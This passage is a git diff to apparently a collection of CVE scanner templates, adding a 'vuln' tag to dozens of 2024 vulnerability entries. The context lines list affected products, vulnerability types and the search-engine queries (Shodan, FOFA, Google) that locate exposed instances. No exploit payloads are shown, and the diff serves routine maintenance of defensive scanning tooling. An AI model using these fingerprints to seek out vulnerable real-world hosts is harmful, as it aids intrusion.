-29,7 +29,7 @@ info: - "title:\"GitHub Enterprise\"" - micro focus dsd fofa-query: "app=\"Github-Enterprise\"" - tags: cve,cve2024,rce,github,enterprise + tags: cve,cve2024,rce,github,enterprise,vuln variables: username: "{{username}}" password: "{{password}}" diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index 4ebdfb1bfec..dab473da961 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -34,7 +34,7 @@ info: - icon_hash=1484947000,1828756398,1170495932 - app="goanywhere-mft" zoomeye-query: app="Fortra GoAnywhere-MFT" - tags: packetstorm,cve,cve2024,auth-bypass,goanywhere,fortra,vkev + tags: packetstorm,cve,cve2024,auth-bypass,goanywhere,fortra,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 469a57ae916..885964fbfbc 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -39,7 +39,7 @@ info: - "/wp-content/plugins/eventon/" - /wp-content/plugins/eventon-lite/ google-query: "inurl:\"/wp-content/plugins/eventon/\"" - tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon,vkev + tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon,vkev,vuln http: - method: POST diff --git a/http/cves/2024/CVE-2024-0250.yaml b/http/cves/2024/CVE-2024-0250.yaml index f51ca6322a3..0a31ffaf201 100644 --- a/http/cves/2024/CVE-2024-0250.yaml +++ b/http/cves/2024/CVE-2024-0250.yaml @@ -20,7 +20,7 @@ info: verified: true fofa-query: body="/wp-content/plugins/analytics-insights" publicwww-query: "/wp-content/plugins/analytics-insights" - tags: cve,cve2024,wpscan,redirect,wp,wp-plugin,wordpress,analytics-insights + tags: cve,cve2024,wpscan,redirect,wp,wp-plugin,wordpress,analytics-insights,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index eea8ed043ef..2b0a484e97f 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -33,7 +33,7 @@ info: - app="ncast-产品" && title=="高清智能录播系统" google-query: intitle:"高清智能录播系统" zoomeye-query: title="高清智能录播系统" - tags: cve,cve2024,ncast,rce,ncast_project,vkev + tags: cve,cve2024,ncast,rce,ncast_project,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-0337.yaml b/http/cves/2024/CVE-2024-0337.yaml index e64ae3d8e98..5c62ca9bbdb 100644 --- a/http/cves/2024/CVE-2024-0337.yaml +++ b/http/cves/2024/CVE-2024-0337.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 publicwww-query: inurl:"/wp-content/plugins/travelpayouts" - tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts + tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index 54f1ff2cb10..83d46ca675b 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -30,7 +30,7 @@ info: product: likeshop shodan-query: http.favicon.hash:874152924 fofa-query: icon_hash=874152924 - tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive,vkev + tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive,vkev,vuln variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-0593.yaml b/http/cves/2024/CVE-2024-0593.yaml index a1205c59575..12ce71c2a35 100644 --- a/http/cves/2024/CVE-2024-0593.yaml +++ b/http/cves/2024/CVE-2024-0593.yaml @@ -24,7 +24,7 @@ info: vendor: awsm product: simple_job_board fofa-query: body="/wp-content/plugins/simple-job-board" - tags: cve,cve2024,wp,wordpress,wp-plugin,simple-job-board,exposure + tags: cve,cve2024,wp,wordpress,wp-plugin,simple-job-board,exposure,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-0692.yaml b/http/cves/2024/CVE-2024-0692.yaml index 6642f378297..a2eeb87192f 100644 --- a/http/cves/2024/CVE-2024-0692.yaml +++ b/http/cves/2024/CVE-2024-0692.yaml @@ -22,7 +22,7 @@ info: vendor: solarwinds product: security_event_manager fofa-query: title="SolarWinds Security Event Manager" - tags: cve,cve2024,solarwinds,event-manager,cisa,vkev + tags: cve,cve2024,solarwinds,event-manager,cisa,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index 1c55b39f079..6a6e646fb41 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -25,7 +25,7 @@ info: product: monitorr shodan-query: http.favicon.hash:"-211006074" fofa-query: "icon_hash=\"-211006074\"" - tags: cve,cve2024,file-upload,intrusive,monitorr + tags: cve,cve2024,file-upload,intrusive,monitorr,vuln variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-0881.yaml b/http/cves/2024/CVE-2024-0881.yaml index cc6f724dc47..2e4cea22bb4 100644 --- a/http/cves/2024/CVE-2024-0881.yaml +++ b/http/cves/2024/CVE-2024-0881.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 3 publicwww-query: "/wp-content/plugins/user-meta/" - tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure + tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-0939.yaml b/http/cves/2024/CVE-2024-0939.yaml index a23f2628ebe..8bc81d78131 100644 --- a/http/cves/2024/CVE-2024-0939.yaml +++ b/http/cves/2024/CVE-2024-0939.yaml @@ -26,7 +26,7 @@ info: vendor: byzoro product: smart_s210_firmware fofa-query: body="Smart管理平台" - tags: cve,cve2024,smart,file-upload,intrusive,rce + tags: cve,cve2024,smart,file-upload,intrusive,rce,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-0986.yaml b/http/cves/2024/CVE-2024-0986.yaml index fa056c78954..93d30f1ab95 100644 --- a/http/cves/2024/CVE-2024-0986.yaml +++ b/http/cves/2024/CVE-2024-0986.yaml @@ -25,7 +25,7 @@ info: vendor: issabel product: pbx fofa-query: title="issabel" - tags: cve,cve2024,isssabel,authenticated,rce,asterisk + tags: cve,cve2024,isssabel,authenticated,rce,asterisk,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-10081.yaml b/http/cves/2024/CVE-2024-10081.yaml index e1e010278e4..34812b4f16b 100644 --- a/http/cves/2024/CVE-2024-10081.yaml +++ b/http/cves/2024/CVE-2024-10081.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1496590341 - tags: cve,cve2024,code-checker,auth-bypass,vkev + tags: cve,cve2024,code-checker,auth-bypass,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index 3c11c0f1edd..9eef5efac10 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -31,7 +31,7 @@ info: product: rebuild shodan-query: http.favicon.hash:"871154672" fofa-query: "icon_hash=\"871154672\"" - tags: cve2024,cve,rebuild,ssrf,ruifang-tech,vkev + tags: cve2024,cve,rebuild,ssrf,ruifang-tech,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-10400.yaml b/http/cves/2024/CVE-2024-10400.yaml index 362f5bd666a..a6f91f0673d 100644 --- a/http/cves/2024/CVE-2024-10400.yaml +++ b/http/cves/2024/CVE-2024-10400.yaml @@ -25,7 +25,7 @@ info: framework: wordpress shodan-query: html:"/wp-content/plugins/tutor/" fofa-query: body="/wp-content/plugins/tutor/" - tags: cve,cve2024,tutor-lms,lms,sqli,vkev + tags: cve,cve2024,tutor-lms,lms,sqli,vkev,vuln variables: num: '999999999' diff --git a/http/cves/2024/CVE-2024-10486.yaml b/http/cves/2024/CVE-2024-10486.yaml index af519f8a1b8..d0f1db2b215 100644 --- a/http/cves/2024/CVE-2024-10486.yaml +++ b/http/cves/2024/CVE-2024-10486.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/google-listings-and-ads/" - tags: cve,cve2024,wp,wordpress,wp-plugin,google-listings-and-ads,info-leak + tags: cve,cve2024,wp,wordpress,wp-plugin,google-listings-and-ads,info-leak,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-10516.yaml b/http/cves/2024/CVE-2024-10516.yaml index 5f09729a961..676ff0446ec 100644 --- a/http/cves/2024/CVE-2024-10516.yaml +++ b/http/cves/2024/CVE-2024-10516.yaml @@ -22,7 +22,7 @@ info: vendor: swiftperformance product: swift_performance_lite fofa-query: body="/wp-content/plugins/swift-performance-lite" - tags: cve,cve2024,wp,wp-plugin,wordpress,swift-performance,lfi + tags: cve,cve2024,wp,wp-plugin,wordpress,swift-performance,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-10571.yaml b/http/cves/2024/CVE-2024-10571.yaml index 666f97b652f..b75e9d6058d 100644 --- a/http/cves/2024/CVE-2024-10571.yaml +++ b/http/cves/2024/CVE-2024-10571.yaml @@ -26,7 +26,7 @@ info: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/chart-builder/" - tags: cve,cve2024,wp,wp-plugin,wordpress,chartify,chart-builder,lfi,vkev + tags: cve,cve2024,wp,wp-plugin,wordpress,chartify,chart-builder,lfi,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index 524fabeeadc..4811b7bc90a 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -31,7 +31,7 @@ info: product: html5_video_player framework: wordpress fofa-query: "\"wordpress\" && body=\"html5-video-player\"" - tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins,vkev + tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-10708.yaml b/http/cves/2024/CVE-2024-10708.yaml index 248c1bf0b34..8766abe9d81 100644 --- a/http/cves/2024/CVE-2024-10708.yaml +++ b/http/cves/2024/CVE-2024-10708.yaml @@ -27,7 +27,7 @@ info: product: system_dashboard framework: wordpress fofa-query: body="/wp-content/plugins/system-dashboard/" - tags: cve,cve2024,wpscan,wordpress,wp-plugin,lfi,auth,system-dashboard + tags: cve,cve2024,wpscan,wordpress,wp-plugin,lfi,auth,system-dashboard,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index a46787b2b8b..bcda0d4eae7 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -30,7 +30,7 @@ info: zoomeye-query: app="WordPress Ultimate Member Plugin" product: ultimate_member vendor: ultimatemember - tags: time-based-sqli,cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli,vkev + tags: time-based-sqli,cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-10783.yaml b/http/cves/2024/CVE-2024-10783.yaml index a9ab1af49f6..890c34929b5 100644 --- a/http/cves/2024/CVE-2024-10783.yaml +++ b/http/cves/2024/CVE-2024-10783.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/mainwp-child/" - tags: cve,cve2024,wp,mainwp-child,wpscan,wordpress,wp-plugin,auth-bypass + tags: cve,cve2024,wp,mainwp-child,wpscan,wordpress,wp-plugin,auth-bypass,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-10812.yaml b/http/cves/2024/CVE-2024-10812.yaml index 3767dacd868..83a54d66735 100644 --- a/http/cves/2024/CVE-2024-10812.yaml +++ b/http/cves/2024/CVE-2024-10812.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 fofa-query: body="gpt_academic" - tags: cve,cve2024,huntr,redirect,oss,gpt_academic,binary-husky + tags: cve,cve2024,huntr,redirect,oss,gpt_academic,binary-husky,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-10908.yaml b/http/cves/2024/CVE-2024-10908.yaml index 1d200a2709b..367c33e1246 100644 --- a/http/cves/2024/CVE-2024-10908.yaml +++ b/http/cves/2024/CVE-2024-10908.yaml @@ -15,7 +15,7 @@ info: shodan-query: html:"Chatbot Arena" verified: true max-request: 1 - tags: cve,cve2024,fastchat,redirect,oss,chatbot,areana + tags: cve,cve2024,fastchat,redirect,oss,chatbot,areana,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-10914.yaml b/http/cves/2024/CVE-2024-10914.yaml index 27a9dd9cd16..4ed81fe0d8d 100644 --- a/http/cves/2024/CVE-2024-10914.yaml +++ b/http/cves/2024/CVE-2024-10914.yaml @@ -23,7 +23,7 @@ info: product: dns-320_firmware shodan-query: http.html:"sharecenter" fofa-query: body="sharecenter" - tags: cve,cve2024,dlink,sharecenter,rce,vkev + tags: cve,cve2024,dlink,sharecenter,rce,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-10915.yaml b/http/cves/2024/CVE-2024-10915.yaml index dcca4d40121..71e005d187a 100644 --- a/http/cves/2024/CVE-2024-10915.yaml +++ b/http/cves/2024/CVE-2024-10915.yaml @@ -25,7 +25,7 @@ info: product: dns-320_firmware shodan-query: http.html:"sharecenter" fofa-query: body="sharecenter" - tags: cve,cve2024,dlink,sharecenter,rce + tags: cve,cve2024,dlink,sharecenter,rce,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-10924.yaml b/http/cves/2024/CVE-2024-10924.yaml index 1a71ca908f9..c40dac0d85e 100644 --- a/http/cves/2024/CVE-2024-10924.yaml +++ b/http/cves/2024/CVE-2024-10924.yaml @@ -31,7 +31,7 @@ info: framework: wordpress shodan-query: html:"/wp-content/plugins/really-simple-ssl" fofa-query: body="/wp-content/plugins/really-simple-ssl" - tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl,vkev + tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2024/CVE-2024-11044.yaml b/http/cves/2024/CVE-2024-11044.yaml index 8b7c8018adf..4f3cbd9ba60 100644 --- a/http/cves/2024/CVE-2024-11044.yaml +++ b/http/cves/2024/CVE-2024-11044.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 fofa-query: body="stable-diffusion-webui" - tags: cve,cve2024,huntr,redirect,oss,stable_diffusion_webui,automatic1111 + tags: cve,cve2024,huntr,redirect,oss,stable_diffusion_webui,automatic1111,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-11303.yaml b/http/cves/2024/CVE-2024-11303.yaml index 4b3e38611cc..387bbab31a6 100644 --- a/http/cves/2024/CVE-2024-11303.yaml +++ b/http/cves/2024/CVE-2024-11303.yaml @@ -18,7 +18,7 @@ info: epss-percentile: 0.90875 metadata: max-request: 1 - tags: seclists,cve,cve2024,korenix,lfi,vkev + tags: seclists,cve,cve2024,korenix,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-11305.yaml b/http/cves/2024/CVE-2024-11305.yaml index b87b7a1edda..6c69cda12d1 100644 --- a/http/cves/2024/CVE-2024-11305.yaml +++ b/http/cves/2024/CVE-2024-11305.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.title:"altenergy power control software" fofa-query: title="altenergy power control software" google-query: intitle:"altenergy power control software" - tags: cve,cve2024,altenergy,iot,sqli,vkev + tags: cve,cve2024,altenergy,iot,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-11320.yaml b/http/cves/2024/CVE-2024-11320.yaml index 6501a35d551..611c4fdad9f 100644 --- a/http/cves/2024/CVE-2024-11320.yaml +++ b/http/cves/2024/CVE-2024-11320.yaml @@ -26,7 +26,7 @@ info: - body="pandora fms - installation wizard" - title="pandora fms" google-query: intitle:"pandora fms" - tags: cve,cve2024,oast,rce,pandora,fms + tags: cve,cve2024,oast,rce,pandora,fms,vuln flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) diff --git a/http/cves/2024/CVE-2024-11396.yaml b/http/cves/2024/CVE-2024-11396.yaml index cbbdc99d7ba..b52188b90ee 100644 --- a/http/cves/2024/CVE-2024-11396.yaml +++ b/http/cves/2024/CVE-2024-11396.yaml @@ -27,7 +27,7 @@ info: framework: wordpress shodan-query: http.html:"wp-content/plugins/event-monster" fofa-query: body="wp-content/plugins/event-monster" - tags: cve,cve2024,wordpress,wp,wp-plugin,event-monster,info-leak,passive + tags: cve,cve2024,wordpress,wp,wp-plugin,event-monster,info-leak,passive,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-11587.yaml b/http/cves/2024/CVE-2024-11587.yaml index 7df1421bc68..5b63601b931 100644 --- a/http/cves/2024/CVE-2024-11587.yaml +++ b/http/cves/2024/CVE-2024-11587.yaml @@ -28,7 +28,7 @@ info: product: idccms fofa-query: title="idcCMS" shodan-query: title:"idcCMS" - tags: cve,cve2024,xss,idccms,vkev + tags: cve,cve2024,xss,idccms,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-11680.yaml b/http/cves/2024/CVE-2024-11680.yaml index 84d29b0b7a9..cb0c5bac1fd 100644 --- a/http/cves/2024/CVE-2024-11680.yaml +++ b/http/cves/2024/CVE-2024-11680.yaml @@ -32,7 +32,7 @@ info: - body="projectsend setup" - body=provided by projectsend google-query: intext:provided by projectsend - tags: cve,cve2024,projectsend,auth-bypass,intrusive,kev,vkev + tags: cve,cve2024,projectsend,auth-bypass,intrusive,kev,vkev,vuln variables: string: "{{randstr}}" diff --git a/http/cves/2024/CVE-2024-11728.yaml b/http/cves/2024/CVE-2024-11728.yaml index a613b9a5c06..99f0cd06b91 100644 --- a/http/cves/2024/CVE-2024-11728.yaml +++ b/http/cves/2024/CVE-2024-11728.yaml @@ -28,7 +28,7 @@ info: product: kivicare framework: wordpress fofa-query: body="/wp-content/plugins/kivicare-clinic-management-system" - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,kivicare-clinic-management-system + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,kivicare-clinic-management-system,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-11740.yaml b/http/cves/2024/CVE-2024-11740.yaml index 7dec3f0d819..177a34aa198 100644 --- a/http/cves/2024/CVE-2024-11740.yaml +++ b/http/cves/2024/CVE-2024-11740.yaml @@ -26,7 +26,7 @@ info: product: download_manager framework: wordpress publicwww-query: "/wp-content/plugins/download-manager/" - tags: cve,cve2024,wordpress,wp-plugin,download-manager,short-code,wp,vkev + tags: cve,cve2024,wordpress,wp-plugin,download-manager,short-code,wp,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml index 6c0d8ce4ce6..66708294583 100644 --- a/http/cves/2024/CVE-2024-1183.yaml +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -23,7 +23,7 @@ info: shodan-query: html:"__gradio_mode__" product: gradio vendor: gradio_project - tags: cve,cve2024,ssrf,oast,gradio + tags: cve,cve2024,ssrf,oast,gradio,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-11921.yaml b/http/cves/2024/CVE-2024-11921.yaml index 0942bbd9f24..9bfa0e0c770 100644 --- a/http/cves/2024/CVE-2024-11921.yaml +++ b/http/cves/2024/CVE-2024-11921.yaml @@ -20,7 +20,7 @@ info: epss-percentile: 0.76308 metadata: max-request: 2 - tags: cve,cve2024,wordpress,wp,wp-plugin,give,xss,authenticated + tags: cve,cve2024,wordpress,wp,wp-plugin,give,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-11972.yaml b/http/cves/2024/CVE-2024-11972.yaml index 4138962a1a2..49d014aadae 100644 --- a/http/cves/2024/CVE-2024-11972.yaml +++ b/http/cves/2024/CVE-2024-11972.yaml @@ -23,7 +23,7 @@ info: product: hunk_companion framework: wordpress fofa-query: body="/wp-content/plugins/hunk-companion/" - tags: cve,cve-2024,wordpress,wp,wp-plugin,hunk-companion,vkev + tags: cve,cve-2024,wordpress,wp,wp-plugin,hunk-companion,vkev,vuln variables: plugin: "{{to_lower(rand_text_alpha(6))}}" diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index 8d18cc8345f..7fde7fc35d1 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -30,7 +30,7 @@ info: fofa-query: body=/wp-content/plugins/sfwd-lms publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" - tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash + tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index 2e9a3877a76..d3a704a39a8 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -30,7 +30,7 @@ info: fofa-query: body=/wp-content/plugins/sfwd-lms publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" - tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash + tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-1210.yaml b/http/cves/2024/CVE-2024-1210.yaml index 94b2e327d65..2ea3e08dc8e 100644 --- a/http/cves/2024/CVE-2024-1210.yaml +++ b/http/cves/2024/CVE-2024-1210.yaml @@ -30,7 +30,7 @@ info: google-query: inurl:"/wp-content/plugins/sfwd-lms" shodan-query: http.html:/wp-content/plugins/sfwd-lms fofa-query: body=/wp-content/plugins/sfwd-lms - tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash + tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index a10d9c7538d..df4596308b0 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: html:"LoadMaster" - tags: cve,cve2024,progress,rce,loadmaster,kev,vkev + tags: cve,cve2024,progress,rce,loadmaster,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-12209.yaml b/http/cves/2024/CVE-2024-12209.yaml index 70938145d63..2f98f127114 100644 --- a/http/cves/2024/CVE-2024-12209.yaml +++ b/http/cves/2024/CVE-2024-12209.yaml @@ -27,7 +27,7 @@ info: product: wp-umbrella framework: wordpress fofa-query: body="/wp-content/plugins/wp-health" - tags: cve,cve2024,wp,wordpress,wp-plugin,wp-health,lfi,vkev + tags: cve,cve2024,wp,wordpress,wp-plugin,wp-health,lfi,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-12760.yaml b/http/cves/2024/CVE-2024-12760.yaml index e688230fa90..424c7219c3e 100644 --- a/http/cves/2024/CVE-2024-12760.yaml +++ b/http/cves/2024/CVE-2024-12760.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"BentoML" - tags: cve,cve2024,gradio,redirect,oss,bentoml + tags: cve,cve2024,gradio,redirect,oss,bentoml,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-12824.yaml b/http/cves/2024/CVE-2024-12824.yaml index aa558b9713e..84a9e56c5c9 100644 --- a/http/cves/2024/CVE-2024-12824.yaml +++ b/http/cves/2024/CVE-2024-12824.yaml @@ -21,7 +21,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2024,intrusive,nokri,unauth + tags: cve,cve2024,intrusive,nokri,unauth,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-12849.yaml b/http/cves/2024/CVE-2024-12849.yaml index 9e2da07066e..b2c0d7a1346 100644 --- a/http/cves/2024/CVE-2024-12849.yaml +++ b/http/cves/2024/CVE-2024-12849.yaml @@ -26,7 +26,7 @@ info: framework: wordpress shodan-query: http.html:"wp-content/plugins/error-log-viewer-wp" fofa-query: body="wp-content/plugins/error-log-viewer-wp" - tags: cve,cve2024,wordpress,wp,wp-plugin,error-log-viewer-wp,lfi + tags: cve,cve2024,wordpress,wp,wp-plugin,error-log-viewer-wp,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-12987.yaml b/http/cves/2024/CVE-2024-12987.yaml index b3fac154c40..de969b0d529 100644 --- a/http/cves/2024/CVE-2024-12987.yaml +++ b/http/cves/2024/CVE-2024-12987.yaml @@ -24,7 +24,7 @@ info: fofa-query: '"excanvas.js" && "lang == \"zh-cn\"" && "detectLang" && server=="DWS"' vendor: DrayTek product: Vigor300B - tags: cve,cve2024,draytek,rce,router,kev,vkev + tags: cve,cve2024,draytek,rce,router,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-13126.yaml b/http/cves/2024/CVE-2024-13126.yaml index c6f38740f58..2161b73282c 100644 --- a/http/cves/2024/CVE-2024-13126.yaml +++ b/http/cves/2024/CVE-2024-13126.yaml @@ -25,7 +25,7 @@ info: fofa-query: body="wp-content/plugins/download-manager/" google-query: inurl:"/wp-content/plugins/download-manager/" shodan-query: html:"wp-content/plugins/download-manager/" - tags: cve,cve2024,wp,wordpress,wp-plugin,directory-listing,download-manager + tags: cve,cve2024,wp,wordpress,wp-plugin,directory-listing,download-manager,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-13159.yaml b/http/cves/2024/CVE-2024-13159.yaml index 0b65becf250..6af924cb3a2 100644 --- a/http/cves/2024/CVE-2024-13159.yaml +++ b/http/cves/2024/CVE-2024-13159.yaml @@ -20,7 +20,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:362091310 fofa-query: icon_hash="362091310" - tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev + tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev,vuln variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-13160.yaml b/http/cves/2024/CVE-2024-13160.yaml index a11da991755..ec46abfd74c 100644 --- a/http/cves/2024/CVE-2024-13160.yaml +++ b/http/cves/2024/CVE-2024-13160.yaml @@ -20,7 +20,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:362091310 fofa-query: icon_hash="362091310" - tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev + tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev,vuln variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-13161.yaml b/http/cves/2024/CVE-2024-13161.yaml index 04242907cfe..ba3989fa77d 100644 --- a/http/cves/2024/CVE-2024-13161.yaml +++ b/http/cves/2024/CVE-2024-13161.yaml @@ -21,7 +21,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:362091310 fofa-query: icon_hash="362091310" - tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev + tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev,vuln variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-13322.yaml b/http/cves/2024/CVE-2024-13322.yaml index 0ab42cc8a71..8fb22f06b12 100644 --- a/http/cves/2024/CVE-2024-13322.yaml +++ b/http/cves/2024/CVE-2024-13322.yaml @@ -20,7 +20,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2024,sqli,time-based-sqli,wp,wp-plugin,wordpress + tags: cve,cve2024,sqli,time-based-sqli,wp,wp-plugin,wordpress,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-13496.yaml b/http/cves/2024/CVE-2024-13496.yaml index eeae49c047d..1f77523c372 100644 --- a/http/cves/2024/CVE-2024-13496.yaml +++ b/http/cves/2024/CVE-2024-13496.yaml @@ -19,7 +19,7 @@ info: metadata: max-requests: 2 fofa-query: body="/wp-content/plugins/gamipress" - tags: cve,cve2024,wp,wordpress,gamipress,sqli,wp-plugin + tags: cve,cve2024,wp,wordpress,gamipress,sqli,wp-plugin,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-13624.yaml b/http/cves/2024/CVE-2024-13624.yaml index 5dc8fb868dd..252857db782 100644 --- a/http/cves/2024/CVE-2024-13624.yaml +++ b/http/cves/2024/CVE-2024-13624.yaml @@ -21,7 +21,7 @@ info: max-request: 2 product: wpmovielibrary fofa-query: body="wp-content/plugins/wpmovielibrary/" - tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wpmovielibrary,authenticated + tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wpmovielibrary,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-13726.yaml 